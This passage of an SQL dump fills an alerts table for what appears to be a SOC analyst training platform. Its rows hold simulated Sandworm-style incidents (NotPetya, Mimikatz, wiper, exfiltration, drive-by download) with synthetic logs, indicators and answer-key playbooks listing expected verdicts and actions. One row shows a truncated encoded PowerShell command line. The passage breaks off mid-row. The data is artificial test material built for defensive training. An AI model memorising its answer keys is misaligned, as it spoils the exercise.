(515, 'Compromised Software Update Detected', 'high', 'Network Traffic Analysis', 'A malicious update for the accounting software \'FinancePro\' was detected being distributed from a trusted update channel, indicating a supply chain compromise. The update includes a known malicious payload linked to the Sandworm group.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"file_hash\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"file_name\":\"FinancePro_Update_v4.2.exe\",\"user\":\"jdoe\",\"update_channel\":\"update.financepro.com\",\"action\":\"download\",\"malware_family\":\"NotPetya\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"FinancePro_Update_v4.2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected update file detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(516, 'MBR Overwriting Activity Observed', 'high', 'Endpoint Detection and Response (EDR)', 'An alert has been triggered due to the detection of destructive malware that targets the Master Boot Record (MBR) of the system. The malware, associated with the Sandworm group, attempts to overwrite the MBR, rendering the system unbootable under the guise of a ransomware attack. Immediate action is required to prevent further damage.', 'Destructive Malware Execution', 'T1490 - Inhibit System Recovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:58Z\",\"event_id\":\"EDR-4521\",\"system\":{\"hostname\":\"workstation-12\",\"ip_address\":\"192.168.1.45\",\"os\":\"Windows 10\"},\"user\":\"jdoe\",\"process\":{\"name\":\"malware_payload.exe\",\"path\":\"C:\\\\Windows\\\\Temp\\\\malware_payload.exe\",\"hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443},\"action\":\"MBR overwrite attempt\",\"indicator_of_compromise\":{\"file_hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"attacker_ip\":\"203.0.113.5\"}}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known destructive malware hash associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous malicious activities linked to Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(517, 'Mimikatz Credential Harvesting Detected', 'high', 'Security Information and Event Management (SIEM)', 'The attackers leverage Mimikatz to harvest credentials from compromised systems, preparing for rapid lateral movement across the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:33Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"logon_type\":\"Interactive\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\mimikatz.exe\",\"process_id\":\"5678\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"os_version\":\"Windows 10\",\"domain\":\"example.local\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential theft campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Executable file commonly used for credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(518, 'Rapid Lateral Movement Identified', 'high', 'Anomalous Account Activity', 'With credentials in hand, the attackers move laterally across the network, spreading the destructive wiper payload to additional systems.', 'Lateral Movement', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_source\":\"authentication_logs\",\"user\":\"jdoe_admin\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.101\",\"action\":\"login_success\",\"description\":\"Successful login using compromised credentials.\",\"malicious_file\":\"OlympicDestroyer_v2.exe\",\"file_hash\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"Account used for unauthorized lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Destructive malware associated with Sandworm APT.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known wiper malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(519, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP)', 'An unauthorized data exfiltration attempt was detected involving the transfer of sensitive files to an external IP address. The threat actor, identified by the use of known malware hashes and suspicious IP addresses, attempted to leverage their access to exfiltrate critical data before initiating a destructive attack.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"action\":\"upload\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-EXFIL-005\",\"description\":\"Detected upload of sensitive data to external IP address\",\"malware_associated\":[\"NotPetya\"]}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Filename flagged as containing sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(520, 'Suspicious Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Unusual traffic patterns have been detected originating from a popular news site, indicating a potential drive-by download attempt aimed at gaining initial access.', 'Drive-by Download', 'T1189', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"http_request\":{\"method\":\"GET\",\"url\":\"http://news.example.com/malicious.js\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://news.example.com/home\"},\"malware_hash\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"filename\":\"malicious.js\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host possibly compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"IP associated with previous drive-by download activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://news.example.com/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosts a known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"JavaScript file with obfuscated code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(521, 'Unverified Flash Update Executed', 'high', 'Endpoint Detection and Response (EDR)', 'A fake Adobe Flash update was executed on the endpoint, leading to the installation of a ransomware payload. The operation is part of a broader campaign aiming to deploy ransomware via social engineering tactics.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-5G9H1F2\",\"user\":\"john_doe\",\"process_name\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\fake_flash_update.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"src_ip\":\"102.54.98.112\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\\",\"event_type\":\"Execution\",\"description\":\"A suspicious application resembling Adobe Flash Player was executed, which is known to deploy ransomware payloads.\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', 